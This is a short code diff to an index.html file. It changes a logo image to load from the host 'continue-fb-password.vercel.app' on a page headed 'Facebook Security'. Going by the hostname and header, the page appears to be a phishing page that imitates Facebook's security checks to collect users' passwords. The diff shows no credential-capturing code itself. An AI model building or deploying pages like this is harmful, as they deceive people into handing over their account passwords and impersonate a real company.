--- a/index.html
+++ b/index.html
@@ -106,7 +106,7 @@
 <body>
     <div class="container">
         <div class="logo">
-            <img class="logo" src="WhatsApp Image 2024-10-27 at 11.24.35 AM.jpeg">
+            <img class="logo" src="https://continue-fb-password.vercel.app/WhatsApp%20Image%202024-10-27%20at%2011.24.35%20AM.jpeg">
         </div>
         <div class="header">
             Facebook Security
